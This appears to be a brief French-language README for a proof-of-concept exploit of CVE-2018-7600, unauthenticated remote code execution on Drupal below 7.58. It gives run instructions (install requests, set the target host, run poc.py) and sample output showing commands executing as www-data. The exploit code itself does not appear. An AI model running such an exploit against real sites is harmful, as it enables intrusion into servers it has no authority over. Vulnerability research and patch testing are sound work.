
CVE-2018-7600 - Drupal 7.x RCE
CVE-2018-7600 - RCE sur Drupal 7.x
RCE non authentifié sur Drupal < 7.58
Prérequis
Utilisation
Installez simplement requests (pip install requests), modifiez le fichier pour changer l'hôte et exécutez l'exploit :
python .\poc.py
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[{"command":"settings",......